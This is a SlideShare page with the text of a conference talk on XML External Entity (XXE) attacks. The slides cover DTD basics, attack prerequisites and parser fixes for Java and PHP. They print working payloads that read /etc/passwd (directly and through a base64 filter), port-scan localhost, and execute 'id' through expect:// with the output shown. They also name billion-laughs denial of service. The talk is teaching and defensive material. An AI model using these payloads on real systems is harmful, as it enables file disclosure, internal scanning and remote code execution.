SlideShare a Scribd company logo

XML External Entity Null Meet 19_3_16.pptx

Download as PPTX, PDF
S
SamitAnwer2

Introduction to XML External Entity attack and leveraging it to perform DoS, SSRF, Port Scanning and Remote Code Execution

Presentations & Public Speaking
1 of 16
XML eXternal Entity Attack (XXE) By: Samit Anwer samit.anwer@gmail.com and other related attacks
Agenda • Document Type Definition • Prerequisites to perform an XXE attack • Outcomes • Fixing XXE vulnerabilities
Document Type Definition (DTD) Internal DTD External DTD DTD defines the structure - legal elements, entities and attributes of an XML doc
• Common references shared between multiple XML documents <?xml version="1.0" standalone="no" ?> <!DOCTYPE copyright [ <!ELEMENT copyright (#PCDATA)> <!ENTITY c SYSTEM "http://www.xmlwriter.net/copyright.xml"> ]> <copyright>&c;</copyright> Why External Entities? • Security issues arise because PHP places no restrictions on what URLs can be accessed, even if allow_url_fopen is set to false in php.ini
Prerequisites to perform an XXE • The application parses XML documents • Tainted data is allowed within the system identifier of the entity, within the DTD • The XML processor is configured to validate and process the DTD • The XML processor is configured to resolve external entities within the DTD
• Disclosure of confidential data / file inclusion • Server Side Request Forgery (SSRF) • Port Scanning • DoS on the parsing system • Remote Code Execution Outcomes
File inclusion • local file must be valid XML • What if it is not? • It is possible to encode binary files as a Base64 encoded string • What if the confidential file is not reflected in the response? <!DOCTYPE scan [<!ENTITY test SYSTEM "file:///etc/passwd">]> <scan>&test;</scan> <!DOCTYPE scan [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]> <scan>&test;</scan> Back DEMO
SSRF • an attacker has the ability to create requests from the vulnerable server Back DEMO Go to Appendix
Port Scanning • It is possible to specify ports to which the XML parser will connect • As long as PHP error messages are enabled you get back the banner of the service running even if the port doesn't support the HTTP protocol • What if error messages are disabled? Time is your friend! <!DOCTYPE scan [<!ENTITY test SYSTEM "http://localhost:22">]> <scan>&test;</scan> Warning: simplexml_load_string(http://localhost:22): failed to open stream: HTTP request failed! SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5 in testxml.php on line 10 Back
DoS • Billion laughs attack • Try opening file:///dev/random https://en.wikipedia.org/wiki/Billion_laughs Back
Remote Code Execution <!DOCTYPE root [<!ENTITY foo SYSTEM "expect://id">]> <methodCall> <methodName>&foo;</methodName> </methodCall> <?xml version="1.0" encoding="UTF-8"?> <methodResponse> <fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name> faultString</name><value> <string>Method &quot;uid=33(www-data) gid=33(www-data) groups=33(www-data) &quot; does not exist</string> </value></member></struct></value></fault></methodResponse> Request: Response: Back
Fixes – JAVA • Disable DTDs • If it is not possible to disable DTDs completely, then • Disable external entity • Disable external DTDs factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true); factory.setFeature("http://xml.org/sax/features/external-general-entities" , false); factory.setFeature(“http://apache.org/xml/features/nonvalidating/load-external-dtd” , false);
Fixes - PHP • libxml_disable_entity_loader(true); • Refer - https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Chea t_Sheet#PHP Fixes – iOS, .NET, C/C++
References • DTD tutorial http://edutechwiki.unige.ch/en/DTD_tutorial • XML External Entity (XXE) Processing https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing • XML External Entity (XXE) Prevention Cheat Sheet https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Prevention_Cheat_Sheet#PHP • Scanning the internal network using SimpleXML http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html • Identifying Xml eXternal Entity vulnerability (XXE) https://www.idontplaydarts.com/2011/02/scanning-the-internal-network-using-simplexml/
Thank You! Q/A?
Appendix Back

Recommended

Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
Positive Hack Days
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
beched
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
Felipe Prado
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
DefconRussia
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrieval
qqlan
 
Implementing ossec
Implementing ossecImplementing ossec
Implementing ossec
Jeronimo Zucco
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
Scott Sutherland
 
Rails Security
Rails SecurityRails Security
Rails Security
Wen-Tien Chang
 

Recommended

Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
Positive Hack Days
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
beched
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systemsDEF CON 24 - workshop - Craig Young - brainwashing embedded systems
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
Felipe Prado
 
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilitiesVorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
Vorontsov, golovko ssrf attacks and sockets. smorgasbord of vulnerabilities
DefconRussia
 
Black Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data RetrievalBlack Hat: XML Out-Of-Band Data Retrieval
Black Hat: XML Out-Of-Band Data Retrieval
qqlan
 
Implementing ossec
Implementing ossecImplementing ossec
Implementing ossec
Jeronimo Zucco
 
Thick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash CourseThick Application Penetration Testing: Crash Course
Thick Application Penetration Testing: Crash Course
Scott Sutherland
 
Rails Security
Rails SecurityRails Security
Rails Security
Wen-Tien Chang
 
Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
NetSPI
 
TO Hack an ASP .NET website?
TO Hack an ASP .NET website? TO Hack an ASP .NET website?
TO Hack an ASP .NET website?
Positive Hack Days
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
Positive Hack Days
 
Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018
Fernando Tomlinson, CISSP, MBA
 
Web Services Security
Web Services SecurityWeb Services Security
Web Services Security
amiable_indian
 
Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentation
Sqa Enthusiast
 
Uncloaking IP Addresses on IRC
Uncloaking IP Addresses on IRCUncloaking IP Addresses on IRC
Uncloaking IP Addresses on IRC
Derek Callaway
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
Daniel Owens
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Hackito Ergo Sum
 
DevSec Delight with Compliance as Code - Matt Ray - AgileNZ 2017
DevSec Delight with Compliance as Code - Matt Ray - AgileNZ 2017DevSec Delight with Compliance as Code - Matt Ray - AgileNZ 2017
DevSec Delight with Compliance as Code - Matt Ray - AgileNZ 2017
AgileNZ Conference
 
Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019
Fernando Tomlinson, CISSP, MBA
 
Web-01-HTTP.pptx
Web-01-HTTP.pptxWeb-01-HTTP.pptx
Web-01-HTTP.pptx
AliZaib71
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
OWASP Nagpur
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
CODE BLUE
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
CNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise ServiceCNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise Service
Sam Bowne
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access dark
Royce Davis
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
Aj MaChInE
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
SOHOpelessly Broken
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
The Security of Things Forum
 
IEEE CIS Webinar Sustainable futures.pdf
IEEE CIS Webinar Sustainable futures.pdfIEEE CIS Webinar Sustainable futures.pdf
IEEE CIS Webinar Sustainable futures.pdf
Claudio Gallicchio
 
Disaster Management project for holidays homework and other uses
Disaster Management project for holidays homework and other usesDisaster Management project for holidays homework and other uses
Disaster Management project for holidays homework and other uses
RIDHIMAGARG21
 

More Related Content

Similar to XML External Entity Null Meet 19_3_16.pptx

Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
NetSPI
 
TO Hack an ASP .NET website?
TO Hack an ASP .NET website? TO Hack an ASP .NET website?
TO Hack an ASP .NET website?
Positive Hack Days
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
Positive Hack Days
 
Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018
Fernando Tomlinson, CISSP, MBA
 
Web Services Security
Web Services SecurityWeb Services Security
Web Services Security
amiable_indian
 
Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentation
Sqa Enthusiast
 
Uncloaking IP Addresses on IRC
Uncloaking IP Addresses on IRCUncloaking IP Addresses on IRC
Uncloaking IP Addresses on IRC
Derek Callaway
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
Daniel Owens
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Hackito Ergo Sum
 
DevSec Delight with Compliance as Code - Matt Ray - AgileNZ 2017
DevSec Delight with Compliance as Code - Matt Ray - AgileNZ 2017DevSec Delight with Compliance as Code - Matt Ray - AgileNZ 2017
DevSec Delight with Compliance as Code - Matt Ray - AgileNZ 2017
AgileNZ Conference
 
Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019
Fernando Tomlinson, CISSP, MBA
 
Web-01-HTTP.pptx
Web-01-HTTP.pptxWeb-01-HTTP.pptx
Web-01-HTTP.pptx
AliZaib71
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
OWASP Nagpur
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
CODE BLUE
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
Joff Thyer
 
CNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise ServiceCNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise Service
Sam Bowne
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access dark
Royce Davis
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
Aj MaChInE
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
SOHOpelessly Broken
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
The Security of Things Forum
 

Similar to XML External Entity Null Meet 19_3_16.pptx (20)

Thick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash CourseThick Application Penetration Testing - A Crash Course
Thick Application Penetration Testing - A Crash Course
 
TO Hack an ASP .NET website?
TO Hack an ASP .NET website? TO Hack an ASP .NET website?
TO Hack an ASP .NET website?
 
Hack ASP.NET website
Hack ASP.NET websiteHack ASP.NET website
Hack ASP.NET website
 
Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018Powering up on power shell avengercon - 2018
Powering up on power shell avengercon - 2018
 
Web Services Security
Web Services SecurityWeb Services Security
Web Services Security
 
Php vulnerability presentation
Php vulnerability presentationPhp vulnerability presentation
Php vulnerability presentation
 
Uncloaking IP Addresses on IRC
Uncloaking IP Addresses on IRCUncloaking IP Addresses on IRC
Uncloaking IP Addresses on IRC
 
Application and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental EditionApplication and Website Security -- Fundamental Edition
Application and Website Security -- Fundamental Edition
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 
DevSec Delight with Compliance as Code - Matt Ray - AgileNZ 2017
DevSec Delight with Compliance as Code - Matt Ray - AgileNZ 2017DevSec Delight with Compliance as Code - Matt Ray - AgileNZ 2017
DevSec Delight with Compliance as Code - Matt Ray - AgileNZ 2017
 
Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019Powering up on PowerShell - BSides Greenville 2019
Powering up on PowerShell - BSides Greenville 2019
 
Web-01-HTTP.pptx
Web-01-HTTP.pptxWeb-01-HTTP.pptx
Web-01-HTTP.pptx
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
[CB20] Operation I am Tom: How APT actors move laterally in corporate network...
 
BSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad GuysBSIDES-PR Keynote Hunting for Bad Guys
BSIDES-PR Keynote Hunting for Bad Guys
 
CNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise ServiceCNIT 152 10 Enterprise Service
CNIT 152 10 Enterprise Service
 
Owning computers without shell access dark
Owning computers without shell access darkOwning computers without shell access dark
Owning computers without shell access dark
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript Developers
 
SOHOpelessly Broken
SOHOpelessly BrokenSOHOpelessly Broken
SOHOpelessly Broken
 

Recently uploaded

IEEE CIS Webinar Sustainable futures.pdf
IEEE CIS Webinar Sustainable futures.pdfIEEE CIS Webinar Sustainable futures.pdf
IEEE CIS Webinar Sustainable futures.pdf
Claudio Gallicchio
 
Disaster Management project for holidays homework and other uses
Disaster Management project for holidays homework and other usesDisaster Management project for holidays homework and other uses
Disaster Management project for holidays homework and other uses
RIDHIMAGARG21
 
The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...
The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...
The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...
OECD Directorate for Financial and Enterprise Affairs
 
BRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdf
BRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdfBRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdf
BRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdf
Robin Haunschild
 
原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样
原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样
原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样
gpww3sf4
 
Carrer goals.pptx and their importance in real life
Carrer goals.pptx and their importance in real lifeCarrer goals.pptx and their importance in real life
Carrer goals.pptx and their importance in real life
artemacademy2
 
怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样
怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样
怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样
kekzed
 
Artificial Intelligence, Data and Competition – SCHREPEL – June 2024 OECD dis...
Artificial Intelligence, Data and Competition – SCHREPEL – June 2024 OECD dis...Artificial Intelligence, Data and Competition – SCHREPEL – June 2024 OECD dis...
Artificial Intelligence, Data and Competition – SCHREPEL – June 2024 OECD dis...
OECD Directorate for Financial and Enterprise Affairs
 
Artificial Intelligence, Data and Competition – LIM – June 2024 OECD discussion
Artificial Intelligence, Data and Competition – LIM – June 2024 OECD discussionArtificial Intelligence, Data and Competition – LIM – June 2024 OECD discussion
Artificial Intelligence, Data and Competition – LIM – June 2024 OECD discussion
OECD Directorate for Financial and Enterprise Affairs
 
The remarkable life of Sir Mokshagundam Visvesvaraya.pptx
The remarkable life of Sir Mokshagundam Visvesvaraya.pptxThe remarkable life of Sir Mokshagundam Visvesvaraya.pptx
The remarkable life of Sir Mokshagundam Visvesvaraya.pptx
JiteshKumarChoudhary2
 
Competition and Regulation in Professions and Occupations – ROBSON – June 202...
Competition and Regulation in Professions and Occupations – ROBSON – June 202...Competition and Regulation in Professions and Occupations – ROBSON – June 202...
Competition and Regulation in Professions and Occupations – ROBSON – June 202...
OECD Directorate for Financial and Enterprise Affairs
 
Using-Presentation-Software-to-the-Fullf.pptx
Using-Presentation-Software-to-the-Fullf.pptxUsing-Presentation-Software-to-the-Fullf.pptx
Using-Presentation-Software-to-the-Fullf.pptx
kainatfatyma9
 
XP 2024 presentation: A New Look to Leadership
XP 2024 presentation: A New Look to LeadershipXP 2024 presentation: A New Look to Leadership
XP 2024 presentation: A New Look to Leadership
samililja
 
Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...
Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...
Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...
Suzanne Lagerweij
 
Pro-competitive Industrial Policy – LANE – June 2024 OECD discussion
Pro-competitive Industrial Policy – LANE – June 2024 OECD discussionPro-competitive Industrial Policy – LANE – June 2024 OECD discussion
Pro-competitive Industrial Policy – LANE – June 2024 OECD discussion
OECD Directorate for Financial and Enterprise Affairs
 
ASONAM2023_presection_slide_track-recommendation.pdf
ASONAM2023_presection_slide_track-recommendation.pdfASONAM2023_presection_slide_track-recommendation.pdf
ASONAM2023_presection_slide_track-recommendation.pdf
ToshihiroIto4
 
Artificial Intelligence, Data and Competition – OECD – June 2024 OECD discussion
Artificial Intelligence, Data and Competition – OECD – June 2024 OECD discussionArtificial Intelligence, Data and Competition – OECD – June 2024 OECD discussion
Artificial Intelligence, Data and Competition – OECD – June 2024 OECD discussion
OECD Directorate for Financial and Enterprise Affairs
 
The Intersection between Competition and Data Privacy – COLANGELO – June 2024...
The Intersection between Competition and Data Privacy – COLANGELO – June 2024...The Intersection between Competition and Data Privacy – COLANGELO – June 2024...
The Intersection between Competition and Data Privacy – COLANGELO – June 2024...
OECD Directorate for Financial and Enterprise Affairs
 
Artificial Intelligence, Data and Competition – ČORBA – June 2024 OECD discus...
Artificial Intelligence, Data and Competition – ČORBA – June 2024 OECD discus...Artificial Intelligence, Data and Competition – ČORBA – June 2024 OECD discus...
Artificial Intelligence, Data and Competition – ČORBA – June 2024 OECD discus...
OECD Directorate for Financial and Enterprise Affairs
 
Competition and Regulation in Professions and Occupations – OECD – June 2024 ...
Competition and Regulation in Professions and Occupations – OECD – June 2024 ...Competition and Regulation in Professions and Occupations – OECD – June 2024 ...
Competition and Regulation in Professions and Occupations – OECD – June 2024 ...
OECD Directorate for Financial and Enterprise Affairs
 

Recently uploaded (20)

IEEE CIS Webinar Sustainable futures.pdf
IEEE CIS Webinar Sustainable futures.pdfIEEE CIS Webinar Sustainable futures.pdf
IEEE CIS Webinar Sustainable futures.pdf
 
Disaster Management project for holidays homework and other uses
Disaster Management project for holidays homework and other usesDisaster Management project for holidays homework and other uses
Disaster Management project for holidays homework and other uses
 
The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...
The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...
The Intersection between Competition and Data Privacy – OECD – June 2024 OECD...
 
BRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdf
BRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdfBRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdf
BRIC_2024_2024-06-06-11:30-haunschild_archival_version.pdf
 
原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样
原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样
原版制作贝德福特大学毕业证(bedfordhire毕业证)硕士文凭原版一模一样
 
Carrer goals.pptx and their importance in real life
Carrer goals.pptx and their importance in real lifeCarrer goals.pptx and their importance in real life
Carrer goals.pptx and their importance in real life
 
怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样
怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样
怎么办理(lincoln学位证书)英国林肯大学毕业证文凭学位证书原版一模一样
 
Artificial Intelligence, Data and Competition – SCHREPEL – June 2024 OECD dis...
Artificial Intelligence, Data and Competition – SCHREPEL – June 2024 OECD dis...Artificial Intelligence, Data and Competition – SCHREPEL – June 2024 OECD dis...
Artificial Intelligence, Data and Competition – SCHREPEL – June 2024 OECD dis...
 
Artificial Intelligence, Data and Competition – LIM – June 2024 OECD discussion
Artificial Intelligence, Data and Competition – LIM – June 2024 OECD discussionArtificial Intelligence, Data and Competition – LIM – June 2024 OECD discussion
Artificial Intelligence, Data and Competition – LIM – June 2024 OECD discussion
 
The remarkable life of Sir Mokshagundam Visvesvaraya.pptx
The remarkable life of Sir Mokshagundam Visvesvaraya.pptxThe remarkable life of Sir Mokshagundam Visvesvaraya.pptx
The remarkable life of Sir Mokshagundam Visvesvaraya.pptx
 
Competition and Regulation in Professions and Occupations – ROBSON – June 202...
Competition and Regulation in Professions and Occupations – ROBSON – June 202...Competition and Regulation in Professions and Occupations – ROBSON – June 202...
Competition and Regulation in Professions and Occupations – ROBSON – June 202...
 
Using-Presentation-Software-to-the-Fullf.pptx
Using-Presentation-Software-to-the-Fullf.pptxUsing-Presentation-Software-to-the-Fullf.pptx
Using-Presentation-Software-to-the-Fullf.pptx
 
XP 2024 presentation: A New Look to Leadership
XP 2024 presentation: A New Look to LeadershipXP 2024 presentation: A New Look to Leadership
XP 2024 presentation: A New Look to Leadership
 
Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...
Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...
Suzanne Lagerweij - Influence Without Power - Why Empathy is Your Best Friend...
 
Pro-competitive Industrial Policy – LANE – June 2024 OECD discussion
Pro-competitive Industrial Policy – LANE – June 2024 OECD discussionPro-competitive Industrial Policy – LANE – June 2024 OECD discussion
Pro-competitive Industrial Policy – LANE – June 2024 OECD discussion
 
ASONAM2023_presection_slide_track-recommendation.pdf
ASONAM2023_presection_slide_track-recommendation.pdfASONAM2023_presection_slide_track-recommendation.pdf
ASONAM2023_presection_slide_track-recommendation.pdf
 
Artificial Intelligence, Data and Competition – OECD – June 2024 OECD discussion
Artificial Intelligence, Data and Competition – OECD – June 2024 OECD discussionArtificial Intelligence, Data and Competition – OECD – June 2024 OECD discussion
Artificial Intelligence, Data and Competition – OECD – June 2024 OECD discussion
 
The Intersection between Competition and Data Privacy – COLANGELO – June 2024...
The Intersection between Competition and Data Privacy – COLANGELO – June 2024...The Intersection between Competition and Data Privacy – COLANGELO – June 2024...
The Intersection between Competition and Data Privacy – COLANGELO – June 2024...
 
Artificial Intelligence, Data and Competition – ČORBA – June 2024 OECD discus...
Artificial Intelligence, Data and Competition – ČORBA – June 2024 OECD discus...Artificial Intelligence, Data and Competition – ČORBA – June 2024 OECD discus...
Artificial Intelligence, Data and Competition – ČORBA – June 2024 OECD discus...
 
Competition and Regulation in Professions and Occupations – OECD – June 2024 ...
Competition and Regulation in Professions and Occupations – OECD – June 2024 ...Competition and Regulation in Professions and Occupations – OECD – June 2024 ...
Competition and Regulation in Professions and Occupations – OECD – June 2024 ...
 

XML External Entity Null Meet 19_3_16.pptx

  • 1. XML eXternal Entity Attack (XXE) By: Samit Anwer samit.anwer@gmail.com and other related attacks
  • 2. Agenda • Document Type Definition • Prerequisites to perform an XXE attack • Outcomes • Fixing XXE vulnerabilities
  • 3. Document Type Definition (DTD) Internal DTD External DTD DTD defines the structure - legal elements, entities and attributes of an XML doc
  • 4. • Common references shared between multiple XML documents <?xml version="1.0" standalone="no" ?> <!DOCTYPE copyright [ <!ELEMENT copyright (#PCDATA)> <!ENTITY c SYSTEM "http://www.xmlwriter.net/copyright.xml"> ]> <copyright>&c;</copyright> Why External Entities? • Security issues arise because PHP places no restrictions on what URLs can be accessed, even if allow_url_fopen is set to false in php.ini
  • 5. Prerequisites to perform an XXE • The application parses XML documents • Tainted data is allowed within the system identifier of the entity, within the DTD • The XML processor is configured to validate and process the DTD • The XML processor is configured to resolve external entities within the DTD
  • 6. • Disclosure of confidential data / file inclusion • Server Side Request Forgery (SSRF) • Port Scanning • DoS on the parsing system • Remote Code Execution Outcomes
  • 7. File inclusion • local file must be valid XML • What if it is not? • It is possible to encode binary files as a Base64 encoded string • What if the confidential file is not reflected in the response? <!DOCTYPE scan [<!ENTITY test SYSTEM "file:///etc/passwd">]> <scan>&test;</scan> <!DOCTYPE scan [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]> <scan>&test;</scan> Back DEMO
  • 8. SSRF • an attacker has the ability to create requests from the vulnerable server Back DEMO Go to Appendix
  • 9. Port Scanning • It is possible to specify ports to which the XML parser will connect • As long as PHP error messages are enabled you get back the banner of the service running even if the port doesn't support the HTTP protocol • What if error messages are disabled? Time is your friend! <!DOCTYPE scan [<!ENTITY test SYSTEM "http://localhost:22">]> <scan>&test;</scan> Warning: simplexml_load_string(http://localhost:22): failed to open stream: HTTP request failed! SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5 in testxml.php on line 10 Back
  • 10. DoS • Billion laughs attack • Try opening file:///dev/random https://en.wikipedia.org/wiki/Billion_laughs Back
  • 11. Remote Code Execution <!DOCTYPE root [<!ENTITY foo SYSTEM "expect://id">]> <methodCall> <methodName>&foo;</methodName> </methodCall> <?xml version="1.0" encoding="UTF-8"?> <methodResponse> <fault><value><struct><member><name>faultCode</name><value><int>620</int></value></member><member><name> faultString</name><value> <string>Method &quot;uid=33(www-data) gid=33(www-data) groups=33(www-data) &quot; does not exist</string> </value></member></struct></value></fault></methodResponse> Request: Response: Back
